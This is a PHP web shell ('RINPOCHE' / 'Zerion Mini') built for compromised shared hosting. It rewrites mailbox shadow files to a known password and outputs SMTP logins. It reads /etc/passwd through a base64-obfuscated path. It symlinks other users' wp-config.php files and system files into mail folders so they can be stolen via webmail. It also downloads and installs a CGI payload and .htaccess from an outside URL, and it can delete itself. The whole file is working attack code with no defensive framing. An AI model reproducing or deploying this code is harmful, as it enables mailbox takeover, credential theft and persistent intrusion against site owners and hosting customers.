55ok
Mini
<?php
#ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL);
//self destruct
//.lock file to prevent from running again
/*
GLOBALS
*/
$user = get_current_user();
$home_dir = str_replace('public_html','',dirname($_SERVER['DOCUMENT_ROOT']));
function get_mail_domains($path) {
if (!is_dir($path) || !is_readable($path)) {
return array();
}
$dh = @opendir($path);
if (!$dh) {
return array();
}
$domains = array();
while (($dir = readdir($dh)) !== false) {
if ($dir == '.' || $dir == '..' || strstr($dir,'dovecot')) {
continue;
}
$dir = trim($dir);
if (preg_match('/^[a-z0-9-]+\.(?:[a-z0-9-]{2,}\.)*[a-z]{2,}$/i', $dir)) {
$domains[] = $dir;
}
}
closedir($dh);
sort($domains);
return $domains;
}
//print_r(get_mail_domains("$home_dir/mail"));
$domains = get_mail_domains("$home_dir/mail");
$domain = $domains[0];
$shadow_file = "$home_dir/etc/$domain/shadow";
$mail_users = "$home_dir/mail/$domain/";
//die();
//mail users
function get_mail_users()
{
global $user;
global $domain;
global $home_dir;
global $mail_users;
$dirs = glob($mail_users . '/*', GLOB_ONLYDIR);
$users = array_map('basename', $dirs); // Just names
return $users;
}
//generate shadow with mail users
function rewrite_shadow($users,$manual)
{
global $shadow_file;
global $domain;
//titles
if ($manual === TRUE)
{
echo "<pre>echo -n '' > $shadow_file;";
}
else
{
echo "SMTP FOUND:<br>";
}
foreach ($users as $user)
{
if ($manual === TRUE)
{
$user_line = base64_encode($user.':$1$Sn2XsHof$rLEoKEFhLjTH6SlKbRo5M0:20442::::::');
//echo "<pre>echo $user_line | base64 -d >> $shadow_file;</pre>";
echo "printf '%s\\n' \"$user_line\" | base64 -d >> \"$shadow_file\";";
echo "printf '%s\\n' >> \"$shadow_file\";";
}
else
{
echo "mail.$domain|$user@$domain|laughingbatman|587<br>";
file_put_contents($shadow_file, "$user:\$1\$Sn2XsHof\$rLEoKEFhLjTH6SlKbRo5M0:20442::::::\n", FILE_APPEND);
}
}
echo "</pre>";
}
//password reset for all mail users + smtp
function shadow()
{
global $user;
global $domain;
global $home_dir;
global $shadow_file;
echo "READING :: $shadow_file <br>
<a href='https://".rtrim($domain,'/').":2096' target='_blank'>=>WRBMAIL<=</a>
<br><br>";
// if readable and not empty choose what user rip(.Trash) + confirm modifications
//reset all users for the all users
if (is_readable($shadow_file)) {
//echo file_get_contents($shadow_file);
echo "==>RESETING ALL USERS<br>";
file_put_contents($shadow_file,''); //reset file
$users = get_mail_users();
rewrite_shadow($users,FALSE);
//check if rewrite successfull
if(!strstr(file_get_contents($shadow_file),'rLEoKEFhLjTH6SlKbRo5M0'))
{
echo "[x] REWRITE FAILED manual cmd:<br>";
rewrite_shadow($users,TRUE);
return;
}
else {echo "==>REWRITE SUCCESSFUL !<br>";}
}
else { echo "Cannot read $shadow_file (permissions/CageFS)<br>"; }
}
function exploit()
{
return;
}
function deploycgi() {
// Remote URLs (replace with your sources)
$cgi_url = 'https://www.magicaldreams.in//upload/media/rab.txt';
$htaccess_url = 'https://www.magicaldreams.in//upload/media/htaccess';
$cgi_path = 'ra.sa';
$htaccess_path = '.htaccess';
// Print the cgi url for quick access
$protocol = isset($_SERVER['HTTPS']) ? 'https://' : 'http://';
$host = $_SERVER['HTTP_HOST'];
$dir = dirname($_SERVER['PHP_SELF']); // Strips 'rinpoche.php'
$final_url = dirname(getenv('SCRIPT_NAME')) . "/$cgi_path \n";
if (file_exists($cgi_path )) {
echo "<br><a href='$final_url' target='_blank'>CGI AVAILABLE</a>";
return;
}
// Download CGI with 755 perms
$cgi_content = @file_get_contents($cgi_url);
if ($cgi_content !== false) {
file_put_contents($cgi_path, $cgi_content);
chmod($cgi_path, 0755);
echo "✅ CGI downloaded: $cgi_path (755)\n";
} else {
echo "❌ Failed to download CGI\n";
return;
}
// Download .htaccess with 644 perms
$htaccess_content = @file_get_contents($htaccess_url);
if ($htaccess_content !== false) {
file_put_contents($htaccess_path, $htaccess_content);
chmod($htaccess_path, 0644);
echo "✅ .htaccess downloaded: $htaccess_path (644)\n" ;
} else {
echo "❌ Failed to download .htaccess\n";
}
echo "<br><a href='$final_url' target='_blank'>CGI AVAILABLE<br></a>";
}
function manual_command_gen($mail_user)
{
global $user;
global $domain;
global $home_dir;
global $shadow_file;
echo "passwd sym :<hr>";
echo "ln -s /etc/passwd $home_dir/mail/$domain/$mail_user/cur/1738133538.M542500P1570694.br.shodan.io,S=800,W=369:2,S";
echo "<br><br>";
}
/* MAIN **
$users = get_mail_users();
echo count($users);
echo rewrite_shadow($users);
exit();
*/
shadow();
//deploycgi();
$mail_users = get_mail_users();
?>
<!DOCTYPE html>
<html>
<head>
<title>RINPOCHE</title>
<style>
body { font-family: monospace; margin: 40px; }
textarea { width: 100%; height: 300px; font-family: monospace; font-size: 14px; }
button { width: 100%; padding: 15px; font-size: 16px; background: #007cba; color: white; border: none; cursor: pointer; }
pre { background: #f4f4f4; padding: 20px; white-space: pre-wrap; }
</style>
</head>
<body>
<h2>Sys users</h2>
<form method=post><button name=cgi>deploy cgi</button></form>
<form method=post><button name=del>🗑️ Clean</button></form>
<form method="POST">
<textarea name="users" placeholder="data">
<?php echo file_get_contents(base64_decode('L2V0Yy9wYXNzd2Q='));?>
</textarea><br><br>
<input type="text" value="public_html/wp-config.php" name="file_to_rip">
<select name="mail_users" id="mail_users" required>
<?php
foreach ($mail_users as $usermail) {
echo "<option value='$usermail'>$usermail</option>";
}
?>
</select>
<button type="submit">START SYMLINKING CONFS</button>
</form>
<form method="POST">
<input type='text' name='symfile' value="/etc/passwd">
<input type='text' name='symetc' hidden="" value="sym for full users">
<select name="mail_users" id="mail_users" required>
<?php
foreach ($mail_users as $usermail) {
echo "<option value='$usermail'>$usermail</option>";
}
?>
</select>
<button type="submit">SYMLINK passwd</button>
</form>
<?php
//config symlinking
if ($_POST['users'])
{
$passwd_var = $_POST['users'];
$file_to_rip = $_POST['file_to_rip'];
$mail_user = $_POST['mail_users'];
//clear inbox
//echo "<br>rm $home_dir/mail/$domain/$mail_user/cur/* <br>";
#echo "symlink() available.<br>";
$lines = explode("\n", $passwd_var);
echo "<pre>";
foreach ($lines as $line)
{
$user_psswd_exploded = explode(':x:',$line);
$user_psswd = $user_psswd_exploded[0];
//print("$user_psswd<br>");
;
$msgid = strtoupper(substr(str_shuffle('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'),0,15));
$trash_mail = "$home_dir/mail/$domain/$mail_user/cur/1738133538.$msgid.br.shodan.io,S=357,W=369:2,S";
///home/$i/public_html/wp-config.php
$home_only = str_replace($user,'',$home_dir);
$symfile = "$home_only$user_psswd/$file_to_rip";
if (function_exists('symlink'))
{
echo "RIP : $symfile<br>";
#break;
symlink($symfile, $trash_mail);
//echo "$symfile => $trash_mail<br>";
}
elseif (function_exists('exec'))
{
// generate cmd from the textarea data
echo "exec() available.";
}
else
{
//echo "symlink()/exec() disabled (e.g., safe mode or hosting restrictions).";
echo "ln -s $symfile $trash_mail;";
}
}
echo "</pre>";
}
if(isset($_POST['del']))
{
unlink(__FILE__);
unlink('.htaccess');
unlink('ra.sa');
}
if(isset($_POST['cgi']))
{
deploycgi();
}
//passwd symlinking
if ($_POST['symetc']) {
$symfile= $_POST['symfile']; // if isset checkbox use symfile else use $etc encrypted b64
$etc = base64_decode('L2V0Yy9wYXNzd2Q=');
//$etc = '/etc/named.conf';
//define the user to target
//$mail_user = 'admin';
$mail_user = $_POST['mail_users'];
$msgid = strtoupper(substr(str_shuffle('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'),0,15));
$trash_mail = "$home_dir/mail/$domain/$mail_user/cur/1738133538.$msgid.br.shodan.io,S=80000000,W=800000000:2,S";
if (function_exists('symlink'))
{
echo "symlink() available.<br>";
symlink($symfile, $trash_mail);
//@touch($trash_mail);
echo "$trash_mail";
}
elseif (function_exists('exec'))
{
// generate cmd from the textarea data
echo "exec() available.";
}
else
{
echo "symlink()/exec() disabled (e.g., safe mode or hosting restrictions). MANUAL COMMAND:<br>";
echo "<pre>ln -s $symfile $trash_mail;</pre>";
}
}
?>
</body>
</html>
<?php
//unlink(__FILE__);
Zerion Mini 1.0